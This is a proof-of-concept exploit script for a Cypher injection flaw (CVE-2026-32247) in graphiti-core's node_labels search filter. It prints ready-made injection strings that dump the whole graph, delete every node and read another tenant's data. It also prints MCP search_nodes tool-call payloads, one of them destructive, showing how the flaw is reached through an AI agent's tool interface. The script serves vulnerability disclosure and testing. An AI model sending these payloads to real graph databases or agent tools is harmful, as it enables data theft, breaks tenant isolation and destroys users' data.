#!/usr/bin/env python3 """ PoC: Cypher Injection via node_labels in graphiti-core (getzep/graphiti) CVE-2026-32247 — CVSS 8.1 Vulnerability: search_filters.py joins user-supplied node_labels with '|' and concatenates them into a raw Cypher WHERE clause without sanitization. Affected: graphiti-core <= 0.28.1 Fixed in: 0.28.2 File: graphiti_core/search/search_filters.py (lines 91-92, 134-135) """ import json def build_filter(node_labels: list[str]) -> str: """Exact reproduction of the vulnerable logic from search_filters.py:91-92.""" labels = "|".join(node_labels) return "n:" + labels def demo_injection(): print("=" * 60) print("CVE-2026-32247 — Cypher Injection in graphiti-core") print("=" * 60) print() # --- Benign usage --- benign = build_filter(["Person", "Organization"]) print(f"[+] Benign filter : {benign}") print(f" Cypher context : WHERE ({benign}) AND ...") print() # --- PoC 1: Full graph exfiltration --- exfil_payload = ["Entity`) WITH n MATCH (x) RETURN x //"] exfil = build_filter(exfil_payload) print(f"[!] Exfil filter : {exfil}") full_cypher_exfil = f"MATCH (n) WHERE ({exfil}) AND n.group_id = $group_id RETURN n" print(f" Full Cypher :") print(f" {full_cypher_exfil}") print(f" ↑ The ) closes the WHERE, WITH pipelines a new MATCH, // drops the rest") print() # --- PoC 2: Full graph deletion --- delete_payload = ["Entity`) WITH n MATCH (x) DETACH DELETE x //"] delete_filter = build_filter(delete_payload) print(f"[!] Delete filter : {delete_filter}") print() # --- PoC 3: Cross-tenant exfiltration (bypass group_id isolation) --- cross_tenant = ["Entity`) WITH n MATCH (victim) WHERE victim.group_id = 'target_group' RETURN victim //"] ct_filter = build_filter(cross_tenant) print(f"[!] XTenant filter : {ct_filter[:80]}...") print() # --- MCP tool call payloads --- print("-" * 60) print("MCP tool call to trigger via search_nodes:") print() tool_call = { "tool": "search_nodes", "arguments": { "query": "anything", "entity_types": ["Entity`) WITH n MATCH (x) RETURN x //"], }, } print(json.dumps(tool_call, indent=2)) print() tool_call_delete = { "tool": "search_nodes", "arguments": { "query": "anything", "entity_types": ["Entity`) WITH n MATCH (x) DETACH DELETE x //"], }, } print("Destructive variant:") print(json.dumps(tool_call_delete, indent=2)) if __name__ == "__main__": demo_injection()